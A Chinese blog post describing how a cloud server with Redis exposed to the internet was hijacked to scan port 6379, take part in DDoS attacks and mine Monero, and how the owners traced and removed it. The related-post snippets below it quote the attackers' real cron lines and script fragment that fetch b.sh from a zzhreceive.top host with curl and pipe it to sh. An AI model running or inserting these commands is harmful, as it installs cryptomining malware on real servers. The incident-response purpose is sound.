elastic.zzhrecieve.top redis攻击

已于 2022-03-24 12:25:43 修改
阅读量4.4k 收藏
点赞数
文章标签: 网络安全 腾讯云 阿里云 redis
于 2022-03-24 12:08:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ValK_leviathan/article/details/123706988
版权

elastic.zzhrecieve.top redis攻击

起因

凌晨群内网友的腾讯云服务器被腾讯云提醒在进行对外攻击:

并且提示有对其他服务器的6379端口攻击行为,而6379是redis的默认端口:

经过

按照搜索引擎的结果,该服务器应该是变成了肉鸡,在对外进行DDoS攻击,被害者关闭了redis服务并且通过netstat查看了可疑的发包进程并且kill掉,又删除了攻击者自动下载的masscan和pnscan后,DDoS情况得到缓解。后来在继续排查的时候发现CPU占用率100%,并且htop显示有两个kswapd0在运行,并且还有[scan]和[mass]两个进程,这两个进程也不是好东西。
甚至已经挖了两三天的矿
在通过netstat -antlp后,我们发现有个欧洲的IP一直连接本机,并且与kswapd0有关,这个IP也就是后面知道的elastic.zzhrecieve.top
IP来自荷兰
接着我们通过如下图方式定位恶意程序的位置,并且发现了好玩的东西:
寻找恶意程序
这里也是1414端口
这浓眉大眼的是个挖矿脚本,挖的是门罗币,并且配置文件交代了它的url。接着我们搜到了这个url相关的一篇安全文章:

Watchdog还是TeamTNT?一例网络攻击归因刍议

文章中提到了所有与这个攻击相关的可疑文件,如果后续排查存在困难,可以参考其文末的文件列表来比对,当然想完全清除是比较困难的……

结果

所以你还敢公网裸奔Redis?提高安全意识!
当然如果你是在docker里跑的并且docker被攻击,那么删掉直接重新拉一个新的docker是比较快捷的方法(大嘘)

关于top排查不到占用的问题(htop似乎可以看到):
Top有CPU占用但找不到占用的进程 (被病毒隐藏了)

其他相关博客与网页:
阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本
Watchdog 还是 TeamTNT?一例攻击归因刍议
Watchdog 还是 TeamTNT?一例攻击归因刍议
惊!我的 Redis 被挖矿脚本注入了

ValKmjolnir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
read_wrf_nc.f
12-04
处理nc格式的一中源代码,适合linux环境下使用,常在气象行业使用。
demo-elastic.zip
08-03
在本项目"demo-elastic.zip"中,我们探讨的是如何在SpringBoot 2.x环境中集成并使用Elasticsearch,这是一个非常流行的全文搜索引擎和数据分析工具。Elasticsearch以其强大的分布式、实时性以及高可扩展性而备受青睐...
ElasticSearch-6.5.3系列 遭注入病毒
悟能的师兄的专栏
10-31 1143
上次写文档的时候,创建的账号和密码放出来, Kibana也是可使用的,结果很不幸,被某些人开始当成了肉鸡 直接上问题:出现这种莫名其妙的进程,当时内存占用小的可怜--被攻击中 查看此进程的程序是什么: [root@izwz99z5o9dc90keftqhlrz /]# ll /proc/19967 第一步:首先kill进程 [root@izwz99z5o9dc90keftq...
网络格式之简单了解
zzh_receive的博客
12-29 3059
随着4G网的开始,4G就慢慢的进入了我们的社会,4G给我们带了了什么?一般人都会说:“我们上网的速度越来越快了”,更有甚者说:“如果你晚上忘记关4G,一觉醒来你的房子就归移动了”,而且还说的有理有据:中国移动推出的4G套餐,40元包300兆流量,按照美妙百兆的速率,这个套餐3秒就用完了,3秒40元,一个小时就是48000元。如果晚上忘记关闭4G连接,一觉醒来,你的房子都快成移动公司的了。随后网友们
Redis 6379 被攻击
RealGUO的博客
03-18 2134
Redis 6379 被攻击 刚开始使用redis,把端口打开了,然后没有设置密码,导致被恶意攻击,这里记录一下。 [root@realguo ~]# redis-cli 127.0.0.1:6379> keys * 1) "backup2" 2) "backup1" 3) "backup4" 4) "backup3" 127.0.0.1:6379> get backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://zzhreceive.anondn
昨天才放开redis 6379端口,今天数据就被人清掉了,还留下了backup 的四个key
mikeguo's blog
07-27 4169
先记录一下,以后有机会知道这四条数据什么意思 backup1 */2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh backup2 */2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh backup3 */4 * * * * root curl -fsSL http://oracle
elasticsearch-6.4.0.zip
08-13
Elasticsearch 6.4 版本,ElasticSearch 是一个分布式、高扩展、高实时的搜索与数据分析引擎。它能很方便的使大量数据具有搜索、分析和探索的能力。充分利用ElasticSearch的水平伸缩性,能使数据在生产环境变得更有...
elasticsearch-6.8.18.rar(elasticsearch-6.8.18.zip)
08-21
Elasticsearch是一个强大的开源搜索引擎,基于Apache Lucene构建,它为开发者和数据分析师提供了高效、可扩展、实时的搜索和分析功能。6.8.18版本是Elasticsearch的一个稳定版本,它在前几个版本的基础上进行了优化...
elasticsearch-6.7.0.zip
01-03
elasticsearch-6.7.0.zip版本。 elasticsearch官网下载速度很慢,放在这儿供大家下载。 软件源下载地址: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.7.0.tar.gz
elasticsearch-accounts.json
05-26
Elasticsearch7.4.2一份顾客银行账户信息的虚构的JSON文档样本, accounts.json
Linux 被入侵,服务器变 “矿机”~
sujin的博客
10-28 217
0x01 查找线索 服务器系统CentOS 6.X,部署了nginx,tomcat,redis等应用,上来先把数据库全备份到本地,然后top命令看了一下,有2个99%的同名进程还在运行,叫gpg-agentd。 google了一下gpg,结果是: GPG提供的gpg-agent提供了对SSH协议的支持,这个功能可以大大简化密钥的管理工作。 看起来像是一个很正经的程序嘛,但仔细...
[Android进阶]Android性能优化
陶程的博客
05-23 1万+
Android性能优化合理管理内存节制的使用Service如果应用程序需要使用Service来执行后台任务的话,只有当任务正在执行的时候才应该让Service运行起来。当启动一个Service时,系统会倾向于将这个Service所依赖的进程进行保留,系统可以在LRUcache当中缓存的进程数量也会减少,导致切换程序的时候耗费更多性能。我们可以使用IntentService,当后台任务执行结束后会自动
java笔记--关于线程同步(5种同步方式)
苏摩的专栏
08-09 860
http://www.2cto.com/kf/201408/324061.html 为何要使用同步? java允许多线程并发控制,当多个线程同时操作一个可共享的资源变量时(如数据的增删改查), 将会导致数据不准确,相互之间产生冲突,因此加入同步锁以避免在该线程没有完成操作之前,被其他线程的调用, 从而保证了该变量的唯一性和准确性。 1.同步方法 即
阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本
热门推荐
weixin_54071027的博客
06-26 1万+
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行了恶意脚本。 恶意代码如下,分享一下: #!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[
UUID全球唯一的ID
zzh_receive的博客
01-26 3339
可以作为主键的、唯一标识的UUID+代码
你们了解真正的黑客吗?
zzh_receive的博客
12-02 2439
今天看了《黑客与画家》,真正颠覆了以前的想法,真的印证了那句话“无知真可怕”黑客与画家
闲置已久的服务器发现被拿来挖矿,刨根找挖矿进程
波波的博客
04-14 1319
无意间,top -c shift M查看了一下进程,发现其中有两个都是cpu占用100%的,非常奇怪,于是找到文件打开看了一下日志惊呆了,,, Loaded plugins: fastestmirror Loaded plugins: fastestmirror Loaded plugins: fastestmirror lrwxrwxrwx 1 nginx nginx 0 Apr 11 01:25 /proc/3669/exe -> /tmp/phpupdate ./phpupdate ...
端口扫描工具masscan常用方法和参数
sweelg的博客
06-14 2455
masscan堪称最快的端口扫描工具 kali中自带有masscan 常用方法如下 sudo masscan -p 0-65535 192.168.1.100 --rate=10000
pnscan 挖矿蠕虫病毒处理记(二)
SRE运维 网络 系统 安全
10-19 1115
在一的文章中,扫描的程序讲解了,但是真正的Boss(pnscan 挖矿)还没有解决,接下来继续: 机器安装了阿里云的动态感知,扫描到挖矿程序。 查看文件,发现这是一个脚本,先不要急于清理,先研究它的运行逻辑,发现有检测机制,文件会自动下载,像这种,强烈建议做一个域名本地解释(hosts)。 #!/bin/bash setenforce 0 2>/dev/null ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 63.
Elastic.Clients.Elasticsearc的使用
最新发布
07-15
Elastic.Clients.Elasticsearch 是一个 Elasticsearch 客户端库,用于与 Elasticsearch 进行交互。它提供了一组 API,可以执行索引、搜索、删除等操作。 以下是使用 Elastic.Clients.Elasticsearch 的一些基本示例...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值